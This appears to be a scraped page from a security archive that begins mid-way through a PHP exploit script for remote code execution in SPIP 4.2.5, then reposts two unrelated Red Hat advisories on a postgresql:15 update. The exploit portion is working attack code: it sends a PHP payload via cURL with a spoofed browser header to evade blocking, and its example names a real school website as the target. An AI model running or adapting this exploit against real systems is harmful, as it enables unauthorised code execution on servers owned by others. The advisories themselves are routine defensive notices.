CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.5 Code Execution

Red Hat Security Advisory 2024-6020-03 - An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6020.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:15 security updateAdvisory ID:        RHSA-2024:6020-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6020Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-4317====================================================================Summary: An update for the postgresql:15 module is now available for Red Hat EnterpriseLinux 9.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which givesa detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: PostgreSQL relation replacement during pg_dump executes arbitrary SQL (CVE-2024-7348)* postgresql: PostgreSQL pg_stats_ext and pg_stats_ext_exprs lack authorization checks (CVE-2024-4317)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4317References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2279935

Red Hat Security Advisory 2024-6020-03

Red Hat Security Advisory 2024-6001-03 - An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6001.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:15 security updateAdvisory ID:        RHSA-2024:6001-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6001Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-4317====================================================================Summary: An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: PostgreSQL relation replacement during pg_dump executes arbitrary SQL (CVE-2024-7348)* postgresql: PostgreSQL pg_stats_ext and pg_stats_ext_exprs lack authorization checks (CVE-2024-4317)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4317References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2279935

Tag

#auth